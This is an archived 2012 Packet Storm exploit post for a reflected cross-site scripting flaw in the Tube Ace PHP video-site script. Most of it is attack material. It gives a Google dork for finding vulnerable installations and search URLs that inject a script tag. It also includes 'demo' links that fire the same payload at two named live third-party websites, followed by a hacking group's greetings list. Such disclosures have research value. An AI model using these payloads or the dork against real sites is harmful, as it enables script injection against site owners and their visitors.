Tube Ace Cross Site Scripting

2012-02-15T00:00:00
ID PACKETSTORM:109802
Type packetstorm
Reporter Daniel Godoy
Modified 2012-02-15T00:00:00

Description

                                        
                                            `# Exploit Title: Tube Ace(Adult PHP Tube Script) XSS Vulnerability  
# Date: 15/02/2012  
# Author: Daniel Godoy  
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com  
# Author Web: www.delincuentedigital.com.ar  
# Software: Tube Ace  
# http://www.tubeace.com  
# Tested on: Linux  
# Dork: "?viewStandard=0"  
  
[Comment]  
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,  
Maximiliano Soler  
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,  
InyeXion, ksha, zerial.  
her0, r0dr1 y demas user de RemoteExecution  
www.remoteexecution.info www.remoteexcution.com.ar  
#RemoteExecution Hacking Group  
  
[PoC]  
  
http://localhost/mobile/search/?q=[XSS]  
  
http://localhost/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=  
  
[DEMO]  
  
http://www.tubeclipz.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=  
  
http://smoketube.tv/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C%2Fscript%3E&channel=  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
`